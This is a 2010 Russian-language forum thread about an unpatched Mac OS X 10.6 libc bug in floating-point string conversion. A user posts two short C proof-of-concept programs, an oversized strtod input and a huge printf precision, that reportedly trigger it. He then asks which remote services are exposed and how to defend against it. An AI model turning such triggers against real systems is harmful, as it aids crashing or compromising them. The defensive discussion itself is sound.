Дыра в Mac OS 10.6

Тема в разделе "WASM.HEAP", создана пользователем semen, 28 янв 2010.

  1. semen

    semen New Member

    Публикаций:
    0
    Регистрация:
    8 июн 2004
    Сообщения:
    334
    Адрес:
    Russia
    Собственно вот http://securityreason.com/securityalert/6932
    Якобы не пофиксено уже 7 мес http://www.theregister.co.uk/2010/01/12/critical_osx_security_bug/
    Пруф на securityreason не работает на 10.6.2, но работают модификации:
    Код (Text):
    1. #include <stdio.h>
    2. #include <stdlib.h>
    3. #include <string.h>
    4.  
    5. int main ()
    6. {
    7.   static char number[1000003];
    8.   char *e;
    9.   double weed;
    10.  
    11.   memset(&number[2], '1', sizeof(number) - 3);
    12.   number[0] = '0';
    13.   number[1] = '.';
    14.   number[sizeof(number) - 1] = '\0';
    15.  
    16.   weed = strtod(number, &e);
    17.   printf("grams = %lf\n", weed);
    18.   return 0;
    19. }
    и
    Код (Text):
    1. #include <stdio.h>
    2. #include <stdlib.h>
    3.  
    4. int main ()
    5. {
    6.   printf("%1.262159f\n", 1.1);
    7.   return 0;
    8. }
    Собственно вопрос: какие порты могут быть атакованы удаленно и вообще как от этого защищаться?
     
  2. valterg

    valterg Active Member

    Публикаций:
    0
    Регистрация:
    19 авг 2004
    Сообщения:
    2.105
    А что MacOs в этом плане чем-то от других ОС отличается! Атакованы могут быть любые порты, защита - либо закрыть если они не нужны, либо "фильтровать базар"... Вот только со средствами тут пожиже...
     
  3. semen

    semen New Member

    Публикаций:
    0
    Регистрация:
    8 июн 2004
    Сообщения:
    334
    Адрес:
    Russia
    valterg
    Попытаться конечно можно любой. Я же про конкретную уязвимость говорю, которую в бсд уже прикрыли. Тут удаленный эксполит точно есть, и атакует он только определенные сервисы.